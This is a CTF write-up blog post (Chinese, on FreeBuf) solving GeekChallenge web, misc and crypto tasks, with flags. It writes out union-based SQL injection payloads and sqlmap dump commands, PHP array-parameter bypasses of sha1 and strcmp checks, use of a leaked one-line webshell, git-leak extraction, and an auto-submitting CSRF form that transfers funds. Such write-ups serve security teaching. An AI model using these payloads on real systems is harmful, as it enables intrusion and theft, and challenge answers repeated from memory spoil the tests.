freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

GeekChallenge
儒道易行 2023-02-13 16:52:58 101855
所属地 河北省

2.GeekChallenge

1.web

1.朋友的学妹

url:http://49.234.224.119:7413/

右键点击查看源码,找到flag=U1lDe0YxQF80c19oNExwZnVsbGxsbGx9

在这里插入图片描述

然后base64解码得到SYC{F1@_4s_h4Lpfullllll}

在这里插入图片描述

2.EZwww

url:http://47.100.46.169:3901/

根据网站提示备份是个好习惯,猜测可以进行敏感文件扫描

在此使用御剑,发现www.zip文件

在这里插入图片描述

访问该文件下载并解压得到flag文件

在这里插入图片描述

打开得到flag:SYC{th1s_1s_4_f4ke_fl4g},这个falg是错误的

在这里插入图片描述

打开index.php文件,审计代码发现

在这里插入图片描述

这段代码的意思是对该段字符串”c3ljbDB2ZXI=“进行base64解码,结果为sycl0ver,并且以post的方式提交数据a=sycl0ver,

在这里插入图片描述

即可得到正确的flag:SYC{Backup_1s_4_good_h4bit_l0l}

在这里插入图片描述

3.刘壮的黑页

url :http://106.54.75.217:8080/

访问该网站,根据提示”你听说过请求方式吗“,可以判断跟GET/POST请求有关

往下翻查看源代码

在这里插入图片描述

这段代码的意思是当用GET方式提交admin值为username参数,用POST方式提交syclover值为password参数时,就会输出flag

在这里插入图片描述

得到flag为SYC{d0_y0u_k0nw_GET?}

在这里插入图片描述

4.欢迎

url:http://49.234.224.119:8000/

根据提示知道不能用GET请求,所以我们可以用burp抓包,修改为POST请求,放包

在这里插入图片描述

得到一段源代码,审查该代码

在这里插入图片描述

此段代码是shal加密函数绕过,意思是说需要提交的参数

前一句roam1与roam2的值或者类型不相同

后一句roam1与roam2的值和类型都相同

参考

x !== y绝对不等于如果 x 不等于 y,或它们类型不相同,则返回 true5!=="5" 返回 true
x === y绝对等于如果 x 等于 y,且它们类型相同,则返回 true5==="5" 返回 false

因为在php中sha1函数无法处理数组,当处理数组时会返回false

两者都为false即可绕过强比较

在这里插入图片描述

构造语句,POST方式提交

roam1[]=1&roam2[]=2

在这里插入图片描述

得到phpinfo页面,搜索,发现这个文件有问题f1444aagggg.php

在这里插入图片描述

通过burp,使用POST方式,访问该文件得到flag:SYC{w31c0m3_t0_5yc_r0@m_php1}

在这里插入图片描述

5.EZgit

url:http://47.100.46.169:3902/

根据提示,本题与git文件泄露有关

下载GitHack-master,使用GitHack.py进行扫描目标网站(注意:这个脚本只能使用python2运行,python3无法运行)

在这里插入图片描述

然而并没有得到正确flag

在这里插入图片描述

访问http://47.100.46.169:3902/.git/

后来知道是git版本错误,更换工具Git_Extract-master

kali里输入:

git clone https://github.com/style-404/Git_Extract.git

在这里插入图片描述

cd Git_Extract

dir

在这里插入图片描述

python2 git_extract.py http://47.100.46.169:3902/.git/

在这里插入图片描述

得到flag:SYC{I_l0ve_sycl0ver_l0l}

在这里插入图片描述

6.我是大黑客

url:http://39.106.144.160:100/

访问网页,发现liuzhuang.php.bak文件

在这里插入图片描述

浏览器访问该文件

在这里插入图片描述

下载下来打开,是一句话木马

在这里插入图片描述

浏览器访问http://39.106.144.160:100/liuzhuang.php

使用蚁剑进行连接,打开终端

cd ../../退出到根目录

find flag查找flag文件

cat flag查看flag文件得到flag:SYC{1iuzHuang_yyd_G0d!}

在这里插入图片描述

7.ezbypass

url:http://49.234.224.119:7417/

浏览页面,根据提示要以GET方式提交a和b两个变量,并且与strcmp的值比较,并让strcmp返回NULL值

在这里插入图片描述

注意a和b不能相等

strcmp()函数只有在相等的情况下返回0。 当strcmp函数比较出错的时候就会返回NULL(也就是0)值

构造url:http://49.234.224.119:7417/?a=1&b=2

在这里插入图片描述

努力,构造url:http://49.234.224.119:7417/?a[]=1&b=2

在这里插入图片描述

根据提示,以POST方式提交一个不是数字的变量c=123a

php弱比较(==) 若字符串以数字开头,则取开头数字作为转换结果,若无则输出0

在这里插入图片描述

得到flag:SYC{php_4s_so_funny}

8.带恶人六撞

url:http://49.234.224.119:7415/

根据提示,数据库里有大家关于他的描述

与数据库有交互的地方就有可能产生SQL注入

第一种方式手注

直接构造?id=1页面正常

直接构造?id=1'页面报错

在这里插入图片描述

此处存在SQL注入

第一种方法,手注

判断字段数为4

?id=1' order by 4-- q

在这里插入图片描述

判断回显点,我们可以在1,2,4处查询我们想要的内容

?id=-1' union select 1,2,3,4-- q

在这里插入图片描述

查询数据库名为geek_sql

?id=-1' union select 1,2,3,database()-- q

在这里插入图片描述

查询数据表名为blog,fllllag

?id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()-- q

在这里插入图片描述

查询fllllag表下的字段名为id,fllllllag

?id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='fllllag'-- q

在这里插入图片描述

查询fllllllag字段的内容welcome_to_syclover,longlone_need_gf,得到SYC{liuzhuang_4s@G00d_m@n}

?id=-1' union select 1,2,3,group_concat(fllllllag) from fllllag-- q

在这里插入图片描述

第二种方式sqlmap跑

查询数据库名为geek_sql

Sqlmap -u http://49.234.224.119:7415/?id=1--dbs --batch

在这里插入图片描述

查询数据库geek_sql的数据表名为blog,fllllag

Sqlmap -u http://49.234.224.119:7415/?id=1-D geek_sql --tables --batch

在这里插入图片描述

查询fllllag表下的字段名为id,fllllllag

Sqlmap -u http://49.234.224.119:7415/?id=1-D geek_sql -T fllllag --columns --batch

在这里插入图片描述

查询fllllllag字段的内容welcome_to_syclover,longlone_need_gf,得到SYC{liuzhuang_4s@G00d_m@n}

Sqlmap -u http://49.234.224.119:7415/?id=1-D geek_sql -T fllllag -C fllllllag --dump --batch

在这里插入图片描述

9.flagshop

url:http://173.82.206.142:8005/index.php

根据提示使用用admin账号登录,盲猜密码admin,成功,也可用burp爆破

在这里插入图片描述

在主页的flag商店页面,下拉,点击购买flag的链接

在这里插入图片描述

考点:csrf(跨站脚本攻击)

在这里插入图片描述

提示:

没有sessionid!别想当管理员(机器人?)

你知道csrf吗?

通过提示知道不需要通过伪造session来成为管理获得钱

进入页面,进行登录注册到达主页

在这里插入图片描述

可以看到购买flag需要10000M

在这里插入图片描述

可以通过Longlone(财务部部长)账户进行突破

跳转到报告页面

在这里插入图片描述

可以看到这里是普通用户和Longlone用户可以交互的地方

当我们提交报告中有链接时,他就会点击链接

这时候就要构造csrf来进行金币盗取

在这里插入图片描述

查看表单信息

验证码通过python脚本撞md5得到

import hashlib

for i in range(9999999):
 md5_ins = hashlib.md5((str(i)).encode('utf-8'))
 a=md5_ins.hexdigest()
 if a[:5] == "6d996":
     print(i)
     break

在这里插入图片描述

构造csrf脚本

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
 <form action="http://173.82.206.142:8005/transfer.php" method="POST" enctype="multipart/form-data">
   <input type="hidden" name="target" value="re1wn" />
   <input type="hidden" name="money" value="100000000000000000000000000000" />
   <input type="hidden" name="messages" value="nihao" />
   <input type="submit" value="Submit request" id="click"/>
 </form>
 <script type="text/javascript">
   document.getElementById("click").click();
 </script>
</body>
</html>

提交到自己的服务器上,在将链接通过报告提交

过一会就会得到自己需要的钱,直接购买flag即可

得到flag:SYC{cross_s1t3_r3q43st_4orgery_1s_44nny}

在这里插入图片描述

10.忏悔的刘壮

漏洞url: http://120.79.197.4:5000/do_answer

考点:爬虫

题目,每次选择一个选项有1/6概率成功

当一次失败后又会重新累计忏悔次数

在这里插入图片描述

查看请求头,知道了每次get访问时cookie中就有答案

在这里插入图片描述

写出爬虫脚本带着cookie中的答案多次提交

import requests

def request_func(req):
 request_n = request.post("http://120.79.197.4:5000/check",data=req.cookies)
 print(request_n.text)
 return request_n

request = requests.session()
req = request.get("http://120.79.197.4:5000/")
req2 = request.post("http://120.79.197.4:5000/check",data=req.cookies)
print(req2.text)
need_req = request_func(req2)
i = 0
while i < 20:
 i += 1
 need_req = request_func(need_req)

在20次忏悔后得到了flag

SYC{this_is_your_flag}

在这里插入图片描述

2.Misc

2.壮言壮语

根据题目给出的信息

佛曰:豆梵能佛冥謹沙怯隸道等孕喝伽訶恐奢耶尼殿怯怖奢三缽南怛缽娑皤寫數皤究呐者醯皤勝孕皤顛皤耶夜哆悉侄羯涅悉怯老若俱勝菩知菩所蘇奢以梵世心亦呐耨夷哆至哆醯即波怯明除怯闍怯集怯尼明皤實怯一心缽呼侄羯夢室諳耨呐提迦梵都都呐孕礙諳那呐彌豆缽智遮諳槃提伽俱穆離冥伊冥那藐罰摩迦諳有諳盡即怯多逝侄婆冥涅神

可以猜测是佛文解密,利用在线网站

http://www.keyfc.net/bbs/tools/tudoucode.aspx

将解码的密文放在下面框里,点击"参悟佛所言的真意"

得到flag:SYC{i_l0ve_Japanese_wife}

在这里插入图片描述

3.Crypto

2.铠甲与萨满

根据提示,猜测是凯撒密码,利用在线解密网站

http://www.atoolbox.net/Tool.php?Id=778

对密文进行解密,解密两次,得到flag:SYC{liuzhuangliuzhuang_bangbangbang}

在这里插入图片描述

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

博客:

https://rdyx0.github.io/

先知社区:

https://xz.aliyun.com/u/37846

CSDN:

https://blog.csdn.net/weixin_48899364?type=blog

公众号:

https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

FreeBuf:

https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

# 渗透测试 # web安全 # 漏洞分析 # 代码审计 # 红队攻防
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 儒道易行 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
儒道易行 LV.7
谢天谢地、不忘祖先、敬偎圣贤
  • 77 文章数
  • 80 关注者
红队攻防文库文章集锦
2023-11-27
红队攻防文库文章集锦
2023-11-27
CTFer成长之路之逻辑漏洞
2023-02-27
文章目录